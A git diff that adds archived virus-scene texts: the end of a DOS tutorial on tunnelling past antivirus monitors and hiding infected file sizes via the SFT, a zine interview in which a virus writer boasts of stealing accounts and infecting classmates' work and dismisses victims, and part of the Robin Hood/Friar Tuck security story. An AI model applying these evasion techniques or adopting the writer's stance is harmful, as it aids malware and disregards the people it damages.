+        2E FF 2E xx xx          jmp far CS:[xxxx]
+
+        2E FF 1E xx xx          call far CS:[xxxx]
+
+        9A xx xx yy yy          call far yyyy:xxxx
+
+        EA xx xx yy yy          jmp far yyyy:xxxx
+
+Of course it's neccessary to check if the destination vector is valid. Just
+scanning for EAh or 9Ah is quite uncertain, so instead you should scan for
+9D EA, 9D 9A, FB EA or FB 9A (9D is a POPF instruction and FB is STI
+which are often used before returning to the old INT 21 vector). It also
+might be a good idea to emulate SHORT or NEAR JMPs, especially when they are
+the first instruction at the entry point of the INT 21h vector.
+It's a good idea to do some AV watchdog scanning while tracing with the
+recursive tunneler and patch the TSR code in memory.
+
+If you need the original INT 2Fh entry point, for example if you use AH=13h
+INT 2Fh and don't want that your undocumented INT 2F call to be intercepted
+just take a look at 70:05h in memory. When using standard MS-DOS or IBM-DOS,
+DOS places a FAR JMP at this location which can be used to get a secure
+INT 2Fh entry point or to hook INT 2Fh with a more stealthy method. You should
+check the this vector before using it, normally it points to a JMP FAR
+instruction (EA xx xx yy yy), but under MS-DOS 7.0 there's a NEAR JMP (E9h)
+which points to a JMP FAR CS:[xxxx] (2E FF 2E xxxx). Under IBM-DOS this
+directly points into the HMA (segment above F8xxh). If you need to access the
+HMA without a watchdog being able to intercept this call scan the HMA
+for:
+        FB              sti
+        80 FC 11        cmp AH,11
+        75 0A           jnz l1
+        0A C0           or AL,AL
+        74 03           jz l2
+        E8 DC FF        call l3
+        CA 02 00        retf 2
+        80 FC 10        cmp AH,10
+
+This is the HMA entry point of INT 2Fh and will allow you to use AX=1216h and
+AX=1220h INT 2Fh without problems. It might be neccessary to enable the HMA
+before scanning the area at F800:xxxx, but usually the HMA is already active
+if you called an INT 21h beforehand.
+
+When your virus is a full file stealth virus, you should consider adding SFT
+stealth. It's quite useless to hide the true file length at AX=4202 INT 21h
+when the AV program can bypass the virus by checking the file SFT entry.
+SFT stealth is quite easy to code, directly after opening an infected file
+reduce the file length in the SFT entry of that file and mask the file date/
+time stamp if your virus use an illegal time stamp to mark infected files.
+This causes no problems unless a program tries to write to such a modified
+handle. To prevent FAT corruption you should then return the SFT to it's former
+state when a AH=40h INT 21h is called. To recognise a modified handle you maybe
+could use the SFT vector as an ID. It's not necessary to fix the handle before
+it's closed when no changes were done to the file. Besides having a better
+stealth cover, the virus no longer needs to intercept AX=4202 INT 21h in
+order to prevent reading from the true file end. Only AH=3Fh INT 21h has to
+be intercepted, and only in the case that a program tries to read in the
+modified file header.
+
+
diff --git a/textfiles.com/virus/rjinterv.iew b/textfiles.com/virus/rjinterv.iew
new file mode 100644
index 00000000..4733f0ae
--- /dev/null
+++ b/textfiles.com/virus/rjinterv.iew
@@ -0,0 +1,649 @@
+Interactive interview with Rajaat
+���������������������������������
+
+I found Rajaat at some .uk address while chatting on IRC. Since I at that
+time had plans for releasing issue #7 and needed to fatten up it a bit, so
+I asked for an interview and he agreed on doing one. While talking, it turned
+out to be a very large interview, and I think it became more of a
+conversation.
+
+Since this interview was done, several interesting things that you should
+be aware of has happend with this character. Some things written here
+isn't correct anymore. Most important to be aware of is that Rajaat is
+a member of a new viruswriting group known as Genesis. Genesis aim for
+quality, and I'm happy to see that Rajaat is not a loner anymore and have
+find a group in where he really belongs. You saw tb_bug by Rhincewind/Vlad
+and Rajaat? Well, you've seen nothing yet..
+
+This article has been edit by me to keep it as "clean" as possible.
+There you go..
+
+TU = The Unforgiven
+RA = Rajaat
+
+
+TU> You probably have read a few of our old interview's with a few other
+    (fame) scene-guys, so, prepere for the same kinda questions as for
+    starters.. . . 'Introduce yourself to the readers. . '
+
+RA> I'm Rajaat, a newcomer in the virus scene and I hope to stay longer in here
+    than all other virus writers from the UK, like ARCV and Black Baron.
+
+TU> Yea, we can always hope so :). Do you have a question you would like me
+    to ask because I don't have too much information about you (except from
+    what I could obtain from your viruses/engines released)?
+
+RA> Heh, you can always ask me why I started to write viruses or how I got
+    involved in writing these things..
+
+TU> Yea, ok. Let's take the normal questions as for now, and then I might know
+    you better after a while :). So, why did you start write these kinda
+    programs?
+
+RA> Eh, as long as the feds don't get to know me better! HAHAHA! The reason I
+    write these viruses is simply I got nothing better to do. After some
+    incident I got kicked out of college and hanging out on the streets sucks,
+    so I better stick to programming.
+
+TU> Any specific reason to you were kicked out from school?
+
+RA> Yea... :) It had to do with some account stealing (from other students) and
+    releasing a virus in their directory (and infected their programming
+    projects), that the teachers had to check (at home, eventually). HAHA
+    These stupid goofs got fucked over so they couldn't judge us..
+
+TU> How did you got caught in the first place?
+
+RA> I was one of the few assembler programmers there and ofcourse my programs
+    weren't infected :) And they found a list with hacked passwords in my
+    drawer.
+
+TU> Ah, okay, I see. . You said you had nothing better to do than to write
+    viruses but why didn't you instead start to program something useful. Then
+    people would appreciate your programs instead of being scared of them?
+
+RA> I can't think of anything useful, most utilities are being written already.
+    And, like you, there are people that like viruses.
+
+TU> I don't like viruses, what makes you think that? ;)
+
+RA> Why would you otherwise write Insane Reality? Or is it something you just
+    have to? I just like to program them, it's a challenge.
+
+TU> Now, you're the one asking questions :). So, let's continue. . . From where
+    did you got your handle "Rajaat" ?
+
+RA> If people know Advanced Dungeons and Dragons (a role playing game) they
+    also might know the Dark Sun world. Rajaat is the one that invented sorcery
+    there and he is the creator of the Champions, like Andropinis.
+
+TU> Oh, I see. Has AD&D or role-playing in general influent you in any way when
+    it comes to writing viruses?
+
+RA> No, I just use the names to give my children (the viruses) a name, nothing
+    more and nothing less.
+
+TU> Isn't it kinda pervert to refer your viruses as your children?
+
+RA> No, see it like this: I created them, I'm the father. I use Turbo Assembler
+    and you can consider it the mother, ah, I don't know, but I feel like I am
+    the father of them.
+							
+TU> Ok, I've heared stories about the viruswriters refering their computer
+    to be their girlfriend and the virus is a result of love between the
+    writer and the computer :). But that is another story, so is this also
+    your motivation to write viruses, to create life and alternative lifeforms?
+
+RA> No, I just do it out of boredom. I can't think of any useful programs to
+    write and writing viruses may bring fame to me, and the UK needs a boost
+    I think. It has been quite silent in here for a time.
+
+TU> Hmm, think you already said that :). Yea, aren't you btw afraid to get
+    caught by Dr.Solly and Scotland Yard computer-crime division or so?
+
+RA> Ofcourse I am, but that will not stop me. I am hard to trace, because I
+    don't be on #virus but a more general channel and not even using the name
+    Rajaat. Furthermore the viruses I spread on school weren't made by me, so
+    that should give them a hard time to find out.
+
+TU> Which viruses did you spread anyways?
+
+RA> The ones that are already very common, like Junkie and Tai-Pan.
+
+TU> Funny, consider both of them are swedish viruses :). Hmmm, which kinda
+    virus do you like (a few examples maybe) and which virus-writers do you
+    look up to?
+
+RA> Er... I don't have many examples, but I like the viruses of Qark (to whom I
+    send Andropinis (anonymously)) and of Priest, but apperently he quitted
+    virus writing. I don't have many idols, because I don't want to influence
+    my programming with other techniques.
+
+TU> Haven't you considred joining (or forming) a virus-writing group?
+
+RA> Yes, I wanted to join VLAD, but the danger is that the more people do know
+    me, the more chance I have to get caught in the end. It's better that I do
+    contributions to various magazines using a anonymous account. I don't care
+    if I work alone or not.
+
+TU> Yea, that seems to be a smart move. Hmmm, how about contributing some new
+    virus of yours to this issue as well?
+
+RA> Sounds good. I still have some stealth bootsector virus here somewhere on
+    my disk. I will comment it a little more and then DCC it to you, ok?
+
+TU> Yea, send it to tuir@fotd.mcn.ru. What's your policy about destructive
+    viruses, and how do you define destructive viruses?
+
+RA> My opinion is that a virus gets more attention if it's destructive.
+
+TU> I saw a polymorphic engine by you btw (Thanks for the greetings!), say,
+    what kinda questions can I ask about that?
+
+RA> Hmmmm.. I don't really know, it's not very polymorphic and should be easy
+    to crack, but it was just made to make it impossible to use a scan string
+    for a virus. I just used it myself once and that's it. I don't know if
+    there are other viruses that use it. Maybe I will write one engine for
+    polymorphic bootsector viruses HAHAHA!
+
+TU> How to detect it then, with cryptoanalyze or something like that (or have
+    you written detection for it yourself)?
+
+RA> You can use cryptanalysis for it and it's also possible to trace the
+    decryptor, like TBAV does. It's just that they have to do something more
+    than usual to detect it. I think the better AV'ers will have no problem
+    detecting it.
+
+TU> Yea, stupid question of myne btw, I already knew that :). Hmm, which engine
+    do you like the most? Hmm, know this (also) is a kinda stupid question to
+    ask since it's like 25 (or so?) engines out there and nearly none of them
+    is released with source-codes making it exteremly time-consuming to make a
+    depth-in study of them all..
+
+RA> I never bothered to look at them closely, indeed. The ones I liked however
+    are DAME (of Dark Angel), the engine in Natas, the engine in Level_3 and
+    TPE 1.4, but I don't have the source code of the last mentioned.
+
+TU> Yea, so, why didn't you released the source-code to your engine?
+
+RA> Nobody would use it, though. I think I will clean up the comments and send
+    it to you sometime, I don't know. RTFM seems finished to me, and
+    continueing it seems a waste of time to me.
+
+TU> Ok, enuff about polymorphism as for now :). How would you descibe the
+    perfect virus?
+
+RA> A virus that takes to much time to detect (by a scanner) that it better can
+    be discarded from it. ;) I don't think there will be the "ultimate" virus.
+
+TU> Yea, polymorphism might be a step toward the right direction, but it's
+    still far from the final solution.
+
+RA> The engines of today prevent easy recognition, but they lack the protective
+    mechanisms that are needed to conceal the virus from debugging.
+
+TU> So, you think an utility that would support stealth, advanced-polymorpism,
+    retro-functions of any kind would be a logical step to do?
+
+RA> No. I don't believe in stealth techniques very much, except for bootsector
+    and partition record infections. File stealth is too "fragile" to do. I
+    believe in polymorphic engines than also generate polymorhic anti-trace
+    routines, like the Ultimute engine, but more advanced.
+
+TU> Hm, retro-functions and polymoprism might fuck the AV'ers and the
+    researchers up, but for the normal user (the one's who get struck with a
+    virus) it won't really matter. If they notice a virus they won't remove
+    (or debug) it themself anyway (not in most cases that is). Then - stealth
+    might be better for spreading purposes because they won't detect it in
+    ages. . Like with Natas or a virus of that capacity. How easy is that do
+    detect for the average Jow-Blow?
+
+RA> Hmmmm, I still don't like it. Look for example at Andropinis. It's very
+    easy to detect in .COM files, but there is also the MBR infection that is
+    stealth indeed. If I have to use stealth on files, it would probably only
+    hide the file size and I would not bother to write a heap of code just to
+    make it also full stealth. (* Full stealth = disinfection/redirection on
+    files as well, - ED *)
+
+TU> The package you described above called "Ultimute engine" which Stormbringer
+    (read: Black Wolf) wrote, what does it do?
+
+RA> Oh, I didn't knew Black Wolf = Stormbringer! It's an engine that generates
+    a decryptor peppered with some antidebugger tricks, but the way he did it
+    can't stop the people who know debugging/tracing tricks well. I have a few
+    ideas, but I don't know if I will make such an engine, but it's on my
+    "to do" list.
+
+TU> What ideas? Or is this private information? :)
+
+RA> I'll tell you when the product is finished, I don't want to reveal anything
+    until it's ready, as with my virus project I am working on.
+
+TU> Ok, how about ART (Antigen's Radical Tunneler), any comments about it?
+
+RA> I've looked at it and it looks very nice, but I won't use other peoples
+    code in my viruses. I rather bother to make an own tunneler instead.
+
+TU> What makes the tunneling code in ART so special you think? Isn't it a waste
+    of bytes to use as much as 1407 bytes for tracing interrupts?
+
+RA> Yes, consider this: you program a virus that uses ART (1407 bytes), regular
+    code to infect COM and EXE files (maybe 400 bytes), bootsector and
+    partition record infection (512 bytes in every case) and some stealth and a
+    polymorphic engine (larger than 1024 bytes for sure). That will make a
+    *huge* virus!
+
+TU> Yea, but was that really an answer to my question? :)
+
+RA> Let me put it this way. There are far more easier tricks that also work and
+    that will take at most 400 bytes. I don't care if ART works with DosEmu of
+    Linux. How many people will use that? I rather write a normal tracer that
+    detects and skips TBDRIVER in memory. There are a few other monitors that
+    block tracing, but TBDRIVER is the most common program used, I think.
+
+TU> Yea, and it only takes about 15 bytes to disable tbdriver anyway, a lot
+    of viruses does that, but do you consider it a waste of bytes to include
+    ART for tunneling-stealth?
+
+RA> Yes, I do. The idea was very nice, but it won't be used by virus writers. I
+    rather use that 15 byte code you mentioned and then trace to the original
+    interrupt 21h.
+
+TU> Yea, ok. It's the same thing as with polymorphic engines; Noone will use
+    them except for their creators, still Antigen released 2 versions of ART,
+    but no virus using them. Hmm. Ok, let's go on with something complete
+    different, shall we?
+    (* Sidnote: VLAD#5 included a virus of Antigen which used ART, this
+    interview was though done before vlad5 was released *)
+
+RA> Uh, OK... (Eddie Murphy intonation (RAW))
+
+TU> Ok ;). So, how are you in a private matter? As most news-paper would
+    describe us (remorsless, rebellion teen with an attitude, a social failure,
+    a malajusted misfit, a . . . . :)), or ?
+
+RA> I'm a very quiet person, there aren't many people that like me, because I
+    don't value properties belonging to someone else. Hence the virus spread on
+    college. I didn't care if they lost their project because of that. The
+    only thing I like is an escape from reality, preferably with booze or
+    role-playing.
+
+TU> Yea, "rather flee the (insane) reality of today, then facing it" :). So,
+    how did your parents react when you was kicked out from school? Mine
+    didn't like that very much I can tell.
+
+RA> Hmmm. After their divorce they just fight with eachother about the house
+    and the money and me and don't listen to me anymore. I can't talk things
+    with them and when they found out I was kicked from school my mother just
+    said I should not hang out on the streets.
+
+TU> So, your mother wants half? :)
+
+RA> Half of what? I don't like talking about it, it caused me a lot of pain.
+
+TU> Uh, (Just a RAW joke, ya'know.. no worries!). Hmm (sorry!), So when did you
+    start with computers and this sort of things?
+
+RA> Hmmmm, I don't exactly know at what age I started (I think 12 or so), but I
+    used a MSX at that time. At college I had to work with PCs, and to buy me
+    off, my father purchased a computer for me (to get in favor again). Now I
+    use his present to make viruses HAHAHA!
+
+TU> You think he would approve?
+
+RA> I don't know. I never told him and I won't care either. I rather leave my
+    parents at once and live on my own.
+
+TU> You seem to say "I don't care" often :)
+
+RA> Why should I care about something if nobody cares about me?
+
+TU> Probably because people only will care about you if you care about them
+    in the first place?
+
+RA> I once cared about my parents, you know. But after they divorce they seem
+    to have forgotten they still had a son. And why should I bother cleaning up
+    their messy life? But enough about that, let's continue talking about
+    viruses.
+
+TU> Sure. How many and which viruses has you written to this day?
+
+RA> I have written 3 resident EXE viruses, 2 resident companion viruses (one of
+    them uses interrupt 28h (dos idle) to infect as fast as possible), 2
+    non-resident COM infectors (one using RTFM) and a multipartite COM infector
+    (Andropinis) and now a stealth bootsector virus (Uniform).
+
+TU> Quite some collection. . . Which virus group did you vote as no #1 as for
+    VLAD#5, and how does your voting in general look?
+
+RA> Vote? I didn't get a vote thing!
+
+TU> Uh, ok, nevermind, it was a voting (kinda who's the best thing concerning
+    groups, viruses, writers and so forth.. ), but ok, without your result
+    being published, which group are you in favour of?
+
+RA> I would rank VLAD as the best, because they are very inventive. The best
+    virus I saw was Natas, it was very good programmed.
+
+TU> Ok, now, let's discuss av-programs/persons and so forth so the AVers also
+    can enjoy this thing, shall we?
+
+RA> What do you want to discuss about them? You mean if I like some of them
+    or not, if their program is good or not? Hmmm, I don't like AVers at all,
+    they all bear some resemblence with Alan Solomon, so I don't wish to talk
+    to them. The antivirus program I like is TBAV, F-PROT and AVP, the rest is
+    not interesting, save for spoofing them with a virus.
+
+TU> I agree you concerning the AV-programs, however I'm afraid that my attitude
+    towards the AVers somehow has become better during the years - less hostile
+    and perhaps less agressive as well. Hm, why do you have this
+    bad-attitude towards AVers that hasn't done anything to you?
+
+RA> They would if they had the chance to, I don't say I hate them, but I won't
+    discuss things with them or even talk to them. They won't see me as a
+    person, but as a virus writer, so I consider talking to them as a waste of
+    time.
+
+TU> Ok, what if I was a researcher as well, wouldn't you then talk to me
+    either?
+
+RA> I don't like dual edged swords, if you know what I mean. So, then I won't
+    talk to you.
+
+TU> Ok, before we continue then, sure I make an anti-virus to one of my own
+    viruses, but released another better virus in the remover for it, would
+    that be acceptable? (* This is the Petra-rm story.. *)
+
+RA> HAHAHA! Why yes, ofcourse it does. Making a remover for a virus doesn't say
+    you are a researcher, and spreading a virus in it is a great idea. I think
+    I'll hack McAfees scanner for a virus of mine.
+
+TU> Yea, that is a great idea I  think. But I did a lot of research before
+    writing that virus, now - isn't that to be a virus-researcher? :)
+
+RA> Yes, but not acknowledged. With researchers I mean Alan Solomon, Fridrik
+    Skulason, Frans Veldman etc.
+
+TU> Yea, AV-researchers that is. Ah well, nevermind. so what makes you think
+    the AV-programs named above makes them interesting?
+
+RA> The programs do their job, as supposed to. F-PROT has an accurate
+    identification, TBAV has pretty good heuristics and AVP has very nice virus
+    demonstrations in it.
+
+TU> Any comments about VSUM and Patricia Hoffman?
+
+RA> HAHAHAHHA!!
+
+TU> That is suppose to mean that she is the biggest failure in the
+    community?
+
+RA> No, not exactly, she made money with it, so she is not a failure. But I
+    don't value VSUM.
+
+TU> Because of the oh-so-holy messed up descriptions of 99% of all viruses
+    included within?
+
+RA> Yes. I don't know how she manages that. She surpassed me with fucking up
+    descriptions. I just described Andropinis very well, so she can simply copy
+    it into her database. I don't like if she messes up descriptions of my
+    viruses.
+
+TU> No, who wants his children to be called cripples when they're not? Hmmm :).
+
+RA> Definitely not me. I think she lost track describing viruses when the rate
+    of discovered viruses increased rapidly. Hmmm, this turns out to be a whole
+    conversation instead of an interview, but that's no problem :)
+
+TU> When the viruses began to increase very rapidly was in 1992 or so I reckon,
+    was you into viruses back then?
+
+RA> No, I didn't write viruses, I just collected them. I even bought "The Virus
+    Clinic" at that time. But he got busted by the beast.
+
+TU> are you refering Alan Solomon as the beast?
+
+RA> He is! He just does that to get his face in front of the cameras again and
+    doesn't give a shit about the rest.
+
+TU> I agree ;). Hence the articles published in IR#5. Hm, but what do you think
+    about his program?
+
+RA> I never seen it, just heard of it. It's supposed to be good, but I can't
+    judge it.
+
+TU> Due to the fact that you hate him?
+
+RA> No, because I don't have his product. I don't hate him, maybe fear him is a
+    more appropiate word for it. He's one bad motherf*cker.
+
+TU> Ok, so have you been involved in any other 'underground' activity
+    than virus-writing?
+
+RA> I used to hang out often in #hack, but since I started writing viruses I
+    left that channel to be more secure. I am not affiliated with any other
+    activities, I just started writing because the UK was too silent.
+
+TU> Well, not very strange due to the fact that Dr.Solly has succeded in busted
+    pretty much about every virus-writer in the UK. I think you are the only
+    english viruswriter left...
+
+RA> Maybe there are others, I don't know. But I am certainly the only one that
+    now surfaces, yes. Maybe the fact that I am the only virus writer in the UK
+    makes me a bit famous. .
+
+TU> Yea, and maybe this little thought-to-be-an-interview helps?
+
+RA> I don't know and do not care either. I just felt like talking to you. Maybe
+    it helps, indeed, and if that's so, it's fine.
+
+TU> So, how has the 'scene' and viruswriting influent you in real life?
+
+RA> It did not influent my life at all. Just instead of trading viruses I
+    started to write them myself. I think that's all. I don't have many
+    activities beside computing, except for drinking in a pub or so.
+
+TU> You seem to spend a awful lot of time behind the computer because you can't
+    find something better to do with your life. You think it's really worth it?
+
+RA> I spend about 6 hours per day behind the keyboard, and about 5 days a week,
+    with maybe the exception if there's a good movie on the television. Friday
+    and Saturday are my "day off".
+
+TU> Seems to me that your viruswriting is more or less a job than a hobby, is
+    that right?
+
+RA> It can't be seen as a job, because it serves no purpose at all. But I have
+    to stand up, otherwise the United Kingdom will perish in the virus
+    community.
+
+TU> Say, so what purpose does a politican serve?
+
+RA> Our goverment is real fucked up. Have you ever seen them? If they agree to
+    something they shout "Yeah" and otherwise they make sounds like pigs.
+    That's also a good description of them, pigs.
+
+TU> Agreed ;). So what is your opinion about politicans trying to forbid the
+    creation, spreading and even collecting/possesing of computer viruses?
+
+RA> That will also include the victims of viruses, not just the underground.
+
+TU> Yeah, ok - so remove the possesing then, do you think creation of computer-
+    viruses should be considered a crime in any way whatsoever?
+
+RA> They just make it illegal because they don't have other good defences. I
+    think it's stupid. They can't do that, because they can't check everyones
+    computer.
+
+TU> Here we go with the clipper-chip again :). Hmmm, but see it as a matter of
+    principle then - not in any use (like most other laws which only works
+    theoretically), do you find it wrong or even illegal to create viruses?
+
+RA> No I think it's perfectly legal to make viruses. What I do on MY computer
+    is MY business, and not of the government, NSY or Alan Solomon! A law that
+    is just theorie is also utter useless, because it can't be used then.
+
+TU> What about spreading? Then the virus is not only on your own computer.
+
+RA> If people want 'em, they got 'em. If unsuspecting victims get a virus, they
+    probably did not take the proper defences. If they are ignorant to viruses,
+    it's their own fucking fault, just like if you fuck without a condom you
+    might get AIDS.
+
+TU> I fuck without condoms :). Anyway - people know how to protect themself
+    against real-life viruses (like aids), but can you really expect everyone
+    to use bullet-proof anti-virus programs running TSR eating memory, or
+    people to debug/disasm a program before running them?
+
+RA> If you fuck without condoms that's your own choice. About users protecting
+    their systems: they don't have to be ASM experts, just check the incoming
+    (mostly illegal) programs or use an integrity checker, like the one of
+    Wolfgang Stiller. That should keep out most of the viruses.
+
+TU> Still it's viruses that could sneak by his program, does they also deserve
+    to get struck with a (let's say) destructive virus, slowly corrupting their
+    data, making them lose their jobs, etc?
+
+RA> No, then IM (* Integrity Master - TU *) is a ill-designed program and
+    should be improved. If a virus can sneak past it, it means IM (it's an
+    example of a CRC program) is not doing it's job right. It's not the fault
+    of the computer user then. And if he is in deep shit I don't really care,
+    but they better choose another program then.
+
+TU> Then who is to blame for them loosing their job (or whatever)? The creator
+    of the virus who (let's say) uploaded it to a vx-board, the sysop of the
+    vx-board, the one who downloaded it and runned it on his harddisk, the
+    person in question who copied a shareware-program from the computer in
+    question (without knowing it was infected), the author of Integrity Master,
+    the system administrator who is hired to keep the computers secure and
+    clean?
+
+RA> HAHAHA! You won't trick me with questions like that! I am not to blame
+    whatsoever. The sysop of the vx-bbs can't be blamed, because all his
+    leechers know it's a virus. If the person that downloaded it runs it on
+    his own system it's his own fault. The person that copies shareware
+    and brings it to his work is out of line, but shouldn't lose his job for
+    that. IM can't be blamed for the man losing his job, only for mal-
+    functioning. The system administrator can't be blamed for the man losing
+    his job either, but he is not able to do what he is hired for: securing
+    the system.
+
+TU> So, you're saying that noone is to be held responsible for him losing his
+    job and even the whole fucking corporation being ruined and that it was
+    all by a fucking coincidende? Like fate as some girl would have put it?
+
+RA> HO! Now you make another assumtion. Now you say the whole company is
+    ruined! That the man loses his job is a stupid decision of the staff. That
+    also causes people not to tell about the infection and even infecting other
+    computers to stay out of trouble. And who is responsible for Lloyds going
+    to the edge of ceasing to excist? They had some bad coincidences, and YES,
+    a virus could be one of them.
+
+TU> Would you feel sorry if you had written the virus in question?
+
+RA> Not at all. I really don't care what would happen. I would regret if a
+    person in a hospital dies for some system fault, but not a company that
+    spends money from the "Names" and can't even do that right anymore. A
+    hospital is there to help people, most companies are there to get richer.
+
+TU> How can one regret something that one never did? :)
+
+RA> HAHAHA! My child did it, not me! :) You have some point in there.
+
+TU> Ok, how can you miss something that you never had?
+
+RA> You won't miss life after you are dead.
+
+TU> Ugh, are you religious?
+
+RA> I'm disappointed in religion. My parents married but now you see it doesn't
+    mean shit. It's just some situation, and can be undone easily, but one of
+    them got hurt. And that's not my father nor my mother, but me.
+
+TU> You said above that you didn't want to talk about this incident, what made
+    you change your mind?
+
+RA> It just happened. The whole thing made me realise that marriage doesn't
+    mean shit and that the ritual is a farce. The people that got better of it
+    was the church and the lawyers. I used to be religious once and went to
+    church every Sunday. Now I do not anymore, but I still believe.
+
+TU> Hmmm, on channel #virus religion is quite a well discussed topics, so
+    why do you believe? I mean it's not that you see any proof from a good
+    god in today's soceity?
+
+RA> Who made this world? We weren't able to do that. But we are made in his
+    own image, that's why I create. But I don't like to discuss religion now,
+    because then we could chat for hours and hours.
+
+TU> Ok, let's have some quick discussion about religion anyways :). Then if God
+    was good and created us (the human beings) from his own image, wouldn't we
+    be good then as well? Or does this mean that you think mankind is good?
+
+RA> How can you define good if there is no evil? One cannot excist without the
+    other. "Good" will lose it's meaning if there's no "evil" to compare with
+    it.
+
+TU> Hm, nice words, but personally, I think it's just words invented by
+    humans to be able to communicate better. Well, if you couldn't compare
+    bad and good then everything would probably be defined as fucking
+    perfect even though it wasn't, eh.. Like an Utopia or so. But since we
+    have completely slitted opinions about this, we might not
+    discuss this kind of things before we finish this interview. We don't
+    want to argue, now do we? :).
+
+RA> We can, but it's out of scope for the interview (it's not that anymore
+    it's a discussion that became very very large) I think.
+
+TU> Yea. Ok, let's us then stop talking about such things as religion.
+    About that little hospital incident above, do you believe in poetical
+    justice? Like if you die because of your own virus making the computers on
+    the hospital when you're being operated in useless?
+
+RA> If that happens I have nothing to worry about anymore.
+
+TU> Ok, let's say that you instead of died got a nice wheel-chair for the rest
+    of your life!
+
+RA> Then I'd rather take my own life, I think. But don't you think you are now
+    going too abstract???
+
+TU> AH, sorry! I usually do :), when I get excited about something. . . .
+    (* This wasn't ment that I got exited about Rajaat spending his life
+    in a wheel-chair, btw.. I'm not that sick, really!!!) Hmm, ok, have you
+    heard of any new virus writing techinques btw?
+
+RA> Er... I think not. It's now just combining techniques, I think. Maybe some
+    people will come up with something good, but I can't think of anything new.
+
+TU> You think all virus-writing techniques for DOS already are invented?
+
+RA> No, but I just don't know what to expect anymore.
+
+TU> Ok, I better be going now, something else you wish to say but never had
+    the oppertunity to say before?
+
+RA> No, I think I have said what I wanted to say. I just will continue here and
+    keep NSY (* New Scotland Yard - ED *) busy for a while.
+
+TU> Any greetings you would like to send out?
+
+RA> Oh, yeah! I want to greet VLAD and P/S. I think that's all.. Oh, yeah,
+    ofcourse Immortal Riot! (* Thanks :)) *)
+
+TU> Not any personal greetings or goto hell messages?
+
+RA> HAHAHA! Yes, go to hell, Dr. Solomon! And personal greetings to Qark and
+    Priest, might he ever read this.
+
+TU> Hmm, okay, nice talking to you, see you around, (don't forget to send me
+    that virus of yours), and keep up the faith! Taw-Taw :).
+
+RA> Sure, it was nice talking to you, I'll message you if I spot you again on
+    IRC, but don't expect me to come to #virus, I better stay out of there,
+    Hermanni also is there sometimes and maybe there are other researchers
+    there also.
+
+TU> Yea, sometimes.. well, as I said, better be going, bye!
+
+RA> Bye!
diff --git a/textfiles.com/virus/robin.hod b/textfiles.com/virus/robin.hod
new file mode 100644
index 00000000..b4e26165
--- /dev/null
+++ b/textfiles.com/virus/robin.hod
@@ -0,0 +1,140 @@
+From R746RZ02@VB.CC.CMU.EDU Fri Mar  3 11:46:50 1989
+To: VIRUS-L@IBM1.CC.LEHIGH.EDU
+Date:         Fri, 3 Feb 89 04:00:00 EST
+Sender:       SECURITY Digest <SECURITY@PYRITE.RUTGERS.EDU>
+From:         AMSTerDamn System <R746RZ02@VB.CC.CMU.EDU>
+Subject:      Viruses and System Security (a story)
+
+[Ed. reprinted from SECURITY Digest]
+
+The following story was posted in news.sysadmin recently.
+
+The more things change, the more they stay the same...
+
+Back in the mid-1970s, several of the system support staff at Motorola
+(I believe it was) discovered a relatively simple way to crack system
+security on the Xerox CP-V timesharing system (or it may have been
+CP-V's predecessor UTS).  Through a simple programming strategy, it was
+possible for a user program to trick the system into running a portion
+of the program in "master mode" (supervisor state), in which memory
+protection does not apply.  The program could then poke a large value
+into its "privilege level" byte (normally write-protected) and could
+then proceed to bypass all levels of security within the file-management
+system, patch the system monitor, and do numerous other interesting
+things.  In short, the barn door was wide open.
+
+Motorola quite properly reported this problem to XEROX via an official
+"level 1 SIDR" (a bug report with a perceived urgency of "needs to be
+fixed yesterday").  Because the text of each SIDR was entered into a
+database that could be viewed by quite a number of people, Motorola
+followed the approved procedure: they simply reported the problem as
+"Security SIDR", and attached all of the necessary documentation,
+ways-to-reproduce, etc. separately.
+
+Xerox apparently sat on the problem... they either didn't acknowledge
+the severity of the problem, or didn't assign the necessary
+operating-system-staff resources to develop and distribute an official
+patch.
+
+Time passed (months, as I recall).  The Motorola guys pestered their
+Xerox field-support rep, to no avail.  Finally they decided to take
+Direct Action, to demonstrate to Xerox management just how easily the
+system could be cracked, and just how thoroughly the system security
+systems could be subverted.
+
+They dug around through the operating-system listings, and devised a
+thoroughly devilish set of patches.  These patches were then
+incorporated into a pair of programs called Robin Hood and Friar Tuck.
+Robin Hood and Friar Tuck were designed to run as "ghost jobs" (daemons,
+in Unix terminology);  they would use the existing loophole to subvert
+system security, install the necessary patches, and then keep an eye on
+one another's statuses in order to keep the system operator (in effect,
+the superuser) from aborting them.
+
+So... one day, the system operator on the main CP-V software-development
+system in El Segundo was surprised by a number of unusual phenomena.
+These included the following (as I recall... it's been a while since I
+heard the story):
+
+- -  Tape drives would rewind and dismount their tapes in the middle of a
+   job.
+
+- -  Disk drives would seek back&forth so rapidly that they'd attempt to
+   walk across the floor.
+
+- -  The card-punch output device would occasionally start up of itself
+   and punch a "lace card" (every hole punched).  These would usually
+   jam in the punch.
+
+- -  The console would print snide and insulting messages from Robin Hood
+   to Friar Tuck, or vice versa.
+
+- -  The Xerox card reader had two output stackers;  it could be
+   instructed to stack into A, stack into B, or stack into A unless a
+   card was unreadable, in which case the bad card was placed into
+   stacker B.  One of the patches installed by the ghosts added some
+   code to the card-reader driver... after reading a card, it would flip
+   over to the opposite stacker.  As a result, card decks would divide
+   themselves in half when they were read, leaving the operator to
+   recollate them manually.
+
+I believe that there were some other effects produced, as well.
+
+Naturally, the operator called in the operating-system developers.  They
+found the bandit ghost jobs running, and X'ed them... and were once
+again surprised.  When Robin Hood was X'ed, the following sequence of
+events took place:
+
+  !X id1
+
+  id1:   Friar Tuck... I am under attack!  Pray save me!  (Robin Hood)
+  id1: Off (aborted)
+
+  id2: Fear not, friend Robin!  I shall rout the Sheriff of Nottingham's men!
+
+  id3: Thank you, my good fellow! (Robin)
+
+Each ghost-job would detect the fact that the other had been killed, and
+would start a new copy of the recently-slain program within a few
+milliseconds.  The only way to kill both ghosts was to kill them
+simultaneously (very difficult) or to deliberately crash the system.
+
+Finally, the system programmers did the latter... only to find that the
+bandits appeared once again when the system rebooted!  It turned out
+that these two programs had patched the boot-time image (the /vmunix
+file, in Unix terms) and had added themselves to the list of programs
+that were to be started at boot time...
+
+The Robin Hood and Friar Tuck ghosts were finally eradicated when the
+system staff rebooted the system from a clean boot-tape and reinstalled
+the monitor.  Not long thereafter, Xerox released a patch for this
+problem.
+
+I believe that Xerox filed a complaint with Motorola's management about
+the merry-prankster actions of the two employees in question.  To the
+best of my knowledge, no serious disciplinary action was taken against
+either of these guys.
+
+Several years later, both of the perpetrators were hired by Honeywell,
+which had purchased the rights to CP-V after Xerox pulled out of the
